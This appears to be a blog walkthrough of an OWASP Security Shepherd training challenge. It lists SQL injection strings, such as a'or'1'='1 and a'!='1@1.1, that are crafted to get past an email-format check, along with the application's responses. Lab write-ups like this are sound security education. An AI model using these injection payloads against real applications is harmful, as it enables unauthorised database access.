OWASP Security Shepherd Project - SQL Injection 2 (Injection Challenge)
Challenge
Solution
Once again, let's try the most classic input a'or'1'='1.It seems that the application do check if the user input is in certain format.
We need to try if we can input something looks like email format, but still trick the SQL server.
Try a@'or'1.com'='1.com => Invalid Email Address was submitted
1@1.1 => There were no results found in your search
Now, we know 1@1.1 is a valid format.
Try 1@1.1'or'1'='1 => Invalid Email Address was submitted
1'or'a@a.a => There were no results found in your search
Now, we know @ character should be place at the last clause.
By the way, 1'or'1@1.1 will success. I guess that is because @ be recognized as special character and 1 means true.
Try 1'or'1@1.1'='1@1.1 => Invalid Email Address was submitted
Now, we know no 2 @ characters are allowed.
Try a'!='1@1.1 =>
Great! We complete the challenge.
留言
張貼留言
Welcome to share your comments or questions : -)
Enjoy life!